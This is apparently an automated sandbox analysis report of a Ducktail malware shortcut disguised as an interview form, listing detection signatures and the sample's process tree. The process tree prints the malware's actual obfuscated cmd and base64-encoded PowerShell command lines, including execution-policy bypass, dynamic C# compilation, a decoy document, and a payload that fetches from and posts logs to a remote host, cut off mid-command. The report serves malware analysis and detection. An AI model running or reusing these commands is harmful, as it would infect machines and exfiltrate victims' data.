Edit tour
Windows
Analysis Report
Online Interview Scheduling Form.lnk
Overview
General Information
Detection
Ducktail
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3528 cmdline:
"C:\Window s\system32 \cmd.exe" /v /k "St^ art /mIn " " pow^er^S ^H^Ell -n^ Ol^o^go -N O^P -e^p B ^y^P^ass - EN^CO^De^d ^cOM^MA^nd "UwB0AGEA cgB0AC0AUA ByAG8AYwBl AHMAcwAgAH AAbwB3AGUA cgBzAGgAZQ BsAGwAIAAt AFcAaQBuAG QAbwB3AFMA dAB5AGwAZQ AgAGgAaQBk AGQAZQBuAC AALQBBAHIA ZwB1AG0AZQ BuAHQATABp AHMAdAAgAC IALQBXAGkA bgBkAG8Adw BTAHQAeQBs AGUAIABIAG kAZABkAGUA bgAiACwAIA AiAC0ATgBv AEwAbwBnAG 8AIgAsACAA IgAtAE4Abw BQAHIAbwBm AGkAbABlAC IALAAgACIA LQBFAHgAZQ BjAHUAdABp AG8AbgBQAG 8AbABpAGMA eQAgAEIAeQ BwAGEAcwBz ACIALAAgAC IALQBFAG4A YwBvAGQAZQ BkAEMAbwBt AG0AYQBuAG QAIABTAFEA QgBGAEEARg BnAEEASQBB AEEAbwBBAE YAcwBBAFYA QQBCAEYAQQ BGAGcAQQBk AEEAQQB1AE EARQBVAEEA VABnAEIARA BBAEcAOABB AFoAQQBCAE oAQQBFADQA QQBSAHcAQg BkAEEARABv AEEATwBnAE IAVgBBAEYA UQBBAFIAZw BBADQAQQBD ADQAQQBSAH cAQgBGAEEA SABRAEEAVQ B3AEIAVQBB AEYASQBBAF MAUQBCAE8A QQBHAGMAQQ BLAEEAQQBv AEEARQBrAE EAZAB3AEIA eQBBAEMAQQ BBAEsAQQBC AGIAQQBGAE 0AQQBlAFEA QgB6AEEASA BRAEEAWgBR AEIAdABBAE MANABBAFYA QQBCAGwAQQ BIAGcAQQBk AEEAQQB1AE EARQBVAEEA YgBnAEIAag BBAEcAOABB AFoAQQBCAH AAQQBHADQA QQBaAHcAQg BkAEEARABv AEEATwBnAE IAVgBBAEYA UQBBAFIAZw BBADQAQQBD ADQAQQBSAH cAQgBsAEEA SABRAEEAVQ B3AEIAMABB AEgASQBBAG EAUQBCAHUA QQBHAGMAQQ BLAEEAQgBi AEEARQBNAE EAYgB3AEIA dQBBAEgAWQ BBAFoAUQBC AHkAQQBIAF EAQQBYAFEA QQA2AEEARA BvAEEAUgBn AEIAeQBBAE cAOABBAGIA UQBCAEMAQQ BHAEUAQQBj AHcAQgBsAE EARABZAEEA TgBBAEIAVA BBAEgAUQBB AGMAZwBCAH AAQQBHADQA QQBaAHcAQQ BvAEEAQwBJ AEEAWQBRAE IASQBBAEYA SQBBAE0AQQ BCAGoAQQBF AGcAQQBUAF EAQQAyAEEA RQB3AEEAZQ BRAEEANQBB AEcANABBAF kAZwBCAFkA QQBGAEkAQQ BhAEEAQgBh AEEARABJAE EAVgBnAEIA MQBBAEYAaw BBAE0AdwBC AHIAQQBIAF UAQQBZAGcA QQB5AEEARA BVAEEAYwB3 AEIAaABBAE YAYwBBAE4A UQBCAHMAQQ BFAHcAQQBl AGcAQgBDAE EARQBVAEEA WQBRAEEAeg BBAEcAOABB AE0AdwBCAG kAQQBHAGMA QQBQAFEAQQ A5AEEAQwBJ AEEASwBRAE EAcABBAEMA awBBAEsAUQ BBAHUAQQBF AE0AQQBUAH cAQgBPAEEA SABRAEEAWg BRAEIATwBB AEgAUQBBAE sAUQBBAHAA QQBBAD0APQ AiAA=="" & & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5264 cmdline:
powerSHEll -nOlogo -NOP -ep B yPass -ENC ODedcOMMAn d "UwB0AGE AcgB0AC0AU AByAG8AYwB lAHMAcwAgA HAAbwB3AGU AcgBzAGgAZ QBsAGwAIAA tAFcAaQBuA GQAbwB3AFM AdAB5AGwAZ QAgAGgAaQB kAGQAZQBuA CAALQBBAHI AZwB1AG0AZ QBuAHQATAB pAHMAdAAgA CIALQBXAGk AbgBkAG8Ad wBTAHQAeQB sAGUAIABIA GkAZABkAGU AbgAiACwAI AAiAC0ATgB vAEwAbwBnA G8AIgAsACA AIgAtAE4Ab wBQAHIAbwB mAGkAbABlA CIALAAgACI ALQBFAHgAZ QBjAHUAdAB pAG8AbgBQA G8AbABpAGM AeQAgAEIAe QBwAGEAcwB zACIALAAgA CIALQBFAG4 AYwBvAGQAZ QBkAEMAbwB tAG0AYQBuA GQAIABTAFE AQgBGAEEAR gBnAEEASQB BAEEAbwBBA EYAcwBBAFY AQQBCAEYAQ QBGAGcAQQB kAEEAQQB1A EEARQBVAEE AVABnAEIAR ABBAEcAOAB BAFoAQQBCA EoAQQBFADQ AQQBSAHcAQ gBkAEEARAB vAEEATwBnA EIAVgBBAEY AUQBBAFIAZ wBBADQAQQB DADQAQQBSA HcAQgBGAEE ASABRAEEAV QB3AEIAVQB BAEYASQBBA FMAUQBCAE8 AQQBHAGMAQ QBLAEEAQQB vAEEARQBrA EEAZAB3AEI AeQBBAEMAQ QBBAEsAQQB CAGIAQQBGA E0AQQBlAFE AQgB6AEEAS ABRAEEAWgB RAEIAdABBA EMANABBAFY AQQBCAGwAQ QBIAGcAQQB kAEEAQQB1A EEARQBVAEE AYgBnAEIAa gBBAEcAOAB BAFoAQQBCA HAAQQBHADQ AQQBaAHcAQ gBkAEEARAB vAEEATwBnA EIAVgBBAEY AUQBBAFIAZ wBBADQAQQB DADQAQQBSA HcAQgBsAEE ASABRAEEAV QB3AEIAMAB BAEgASQBBA GEAUQBCAHU AQQBHAGMAQ QBLAEEAQgB iAEEARQBNA EEAYgB3AEI AdQBBAEgAW QBBAFoAUQB CAHkAQQBIA FEAQQBYAFE AQQA2AEEAR ABvAEEAUgB nAEIAeQBBA EcAOABBAGI AUQBCAEMAQ QBHAEUAQQB jAHcAQgBsA EEARABZAEE ATgBBAEIAV ABBAEgAUQB BAGMAZwBCA HAAQQBHADQ AQQBaAHcAQ QBvAEEAQwB JAEEAWQBRA EIASQBBAEY ASQBBAE0AQ QBCAGoAQQB FAGcAQQBUA FEAQQAyAEE ARQB3AEEAZ QBRAEEANQB BAEcANABBA FkAZwBCAFk AQQBGAEkAQ QBhAEEAQgB hAEEARABJA EEAVgBnAEI AMQBBAEYAa wBBAE0AdwB CAHIAQQBIA FUAQQBZAGc AQQB5AEEAR ABVAEEAYwB 3AEIAaABBA EYAYwBBAE4 AUQBCAHMAQ QBFAHcAQQB lAGcAQgBDA EEARQBVAEE AWQBRAEEAe gBBAEcAOAB BAE0AdwBCA GkAQQBHAGM AQQBQAFEAQ QA5AEEAQwB JAEEASwBRA EEAcABBAEM AawBBAEsAU QBBAHUAQQB FAE0AQQBUA HcAQgBPAEE ASABRAEEAW gBRAEIATwB BAEgAUQBBA EsAUQBBAHA AQQBBAD0AP QAiAA==" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7116 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6204 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden -NoLogo -N oProfile - ExecutionP olicy Bypa ss -Encode dCommand S QBFAFgAIAA oAFsAVABFA FgAdAAuAEU ATgBDAG8AZ ABJAE4ARwB dADoAOgBVA FQARgA4AC4 ARwBFAHQAU wBUAFIASQB OAGcAKAAoA EkAdwByACA AKABbAFMAe QBzAHQAZQB tAC4AVABlA HgAdAAuAEU AbgBjAG8AZ ABpAG4AZwB dADoAOgBVA FQARgA4AC4 ARwBlAHQAU wB0AHIAaQB uAGcAKABbA EMAbwBuAHY AZQByAHQAX QA6ADoARgB yAG8AbQBCA GEAcwBlADY ANABTAHQAc gBpAG4AZwA oACIAYQBIA FIAMABjAEg ATQA2AEwAe QA5AG4AYgB YAFIAaABaA DIAVgB1AFk AMwBrAHUAY gAyADUAcwB hAFcANQBsA EwAegBCAEU AYQAzAG8AM wBiAGcAPQA 9ACIAKQApA CkAKQAuAEM ATwBOAHQAZ QBOAHQAKQA pAA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 320 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\lsozgn au\lsozgna u.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 5596 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES4DCB.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\lso zgnau\CSCD C8C4E3F939 14FB7BA165 C9B4C26D24 F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 6048 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Version 5 .1 -s -NoL ogo -NoPro file MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WINWORD.EXE (PID: 3652 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /n "C:\Users \user\AppD ata\Local\ Temp\Onlin e Intervie w Scheduli ng Form.do cx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) - cmd.exe (PID: 6564 cmdline:
"C:\Window s\system32 \cmd.exe" /c start / min "" pow ershell.ex e -WindowS tyle hidde n -NoLogo -NoProfile -Executio nPolicy by pass -Enco dedCommand JAB1AHIAa QAgAD0AIAA iAGgAdAB0A HAAcwA6AC8 ALwBnAG0Ad ABhAGcAZQB uAGMAeQAuA G8AbgBsAGk AbgBlAC8AZ gBpAGwAZQA yAC8AOAA0A GUAMAAwADk AYwA1AGUAM gA5ADgAOAA yADMAMgAzA DUAOAAwAGI ANwBjADcAM AAwAGQANgB kADcAZgBiA GYAMgAwADc AZABmADMAN gA4AGQAZgA wADIAMwBhA DYAMAA3ADc AMQAwAGMAY QA3AGYANAB jADEANgA4A DUANgBjAGY AZgA5ADcAY gA3ADgANgA 1ADQAYQA4A DgAMwA5ADk AOQAxADgAM gBhADAANQA 0ADAANAA3A DgAOQAwAGM AOAA2ADMAY gBhADMAOAB jAGQAMQA0A DIAZABjADE AMQBjAGMAZ QA4AGYANwA 2ADEAMAA2A DMANwA5AGE AZAAyAGUAM QA1ADYAMAA xAGYAMAA0A GIAZQA0AGY ANgA0ADAAO AA0ADgAMwB jADUAMQA1A GEAZgBkAGQ AZgA0ADAAZ gAxAGEANgA wAGEAOAA3A DEAOAA1AGE AZgA5ADUAY wAzAGQANgB lADEANABiA DEAYgA4ADU AZgAxAGQAM wA2AGUAZAA 2ADkAYQBiA GIANwAzADU AYQA2ADcAM wA1ADEAZQA yADEAMgA4A GYAZgBiADc AMwBkADQAN AA5AGMAMwB iACIAOwANA AoAJABjAG8 AdQBuAHQAI AA9ACAAMQA wADAAOwANA AoADQAKAA0 ACgANAAoAZ gB1AG4AYwB 0AGkAbwBuA CAAUwBlAG4 AZAAgAHsAD QAKACAAIAA gACAAcABhA HIAYQBtACg AIABbAFAAU wBPAGIAagB lAGMAdABdA CAAJABsAG8 AZwBNAHMAZ wAgACkADQA KAA0ACgAgA CAAIAAgACM AIABDAG8Ab gB2AGUAcgB 0ACAAYgBvA GQAeQAgAHQ AbwAgAHMAd AByAGkAbgB nAA0ACgAgA CAAIAAgACQ AcwB0AHIAa QBuAGcAQgB vAGQAeQAgA D0AIABbAHM AdAByAGkAb gBnAF0AKAA kAGwAbwBnA E0AcwBnACA AfAAgAEMAb wBuAHYAZQB yAHQAVABvA C0ASgBzAG8 AbgApADsAD QAKACAAIAA gACAAJABsA G8AZwBNAGU AcwBzAGEAZ wBlAHMAIAA 9ACAAQAAoA CkAOwANAAo AIAAgACAAI AAkAGwAbwB nAE0AZQBzA HMAYQBnAGU AcwAgACsAP QAgACQAcwB 0AHIAaQBuA GcAQgBvAGQ AeQA7AA0AC gAgACAAIAA gACQAbABvA GcATQBlAHM AcwBhAGcAZ QBzACAAKwA 9ACAAIgAtA C0ALQAtAC0 ALQAtAC0AL QAtACIAOwA NAAoADQAKA CAAIAAgACA AJABoAGUAY QBkAGUAcgB zACAAPQAgA EAAewB9ADs ADQAKACAAI AAgACAAJAB rAGUAeQAgA D0AIAAiAEM AbwBuAHQAZ QBuAHQALQB UAHkAcABlA CIAOwANAAo AIAAgACAAI AAkAHYAYQB sAHUAZQAgA D0AIAAiAGE AcABwAGwAa QBjAGEAdAB pAG8AbgAvA GoAcwBvAG4 AIgA7AA0AC gANAAoAIAA gACAAIAAkA GgAZQBhAGQ AZQByAHMAW wAkAGsAZQB 5AF0AIAA9A CAAJAB2AGE AbAB1AGUAO wANAAoAIAA gACAAIAAkA HUAcgBpACA APQAgACIAT ABPAEcAVQB SAEwAIgA7A A0ACgAgACA AIAAgAHQAc gB5AA0ACgA gACAAIAAgA CAAIAAgACA AewANAAoAI AAgACAAIAA gACAAIAAgA CAAIAAgACA AJABiAG8AZ AB5ACAAPQA gACQAbABvA GcATQBlAHM AcwBhAGcAZ QBzACAAfAA gAEMAbwBuA HYAZQByAHQ AVABvAC0AS gBzAG8AbgA 7AA0ACgAgA CAAIAAgACA AIAAgACAAI AAgACAAIAB JAG4AdgBvA GsAZQAtAFc AZQBiAFIAZ QBxAHUAZQB zAHQAIAAtA FUAcgBpACA AJAB1AHIAa QAgAC0ATQB lAHQAaABvA GQAIABQAG8 AcwB0ACAAL QBIAGUAYQB kAGUAcgBzA CAAJABoAGU AYQBkAGUAc gBzACAALQB CAG8AZAB5A CAAJABiAG8 AZAB5AA0AC gAgACAAIAA gACAAIAAgA CAAfQANAAo AIAAgACAAI AAgACAAIAA gAGMAYQB0A GMAaAB7AA0 ACgAgACAAI AAgACAAIAA gACAAIAAgA CAAIAANAAo AIAAgACAAI AAgACAAIAA gAH0ADQAKA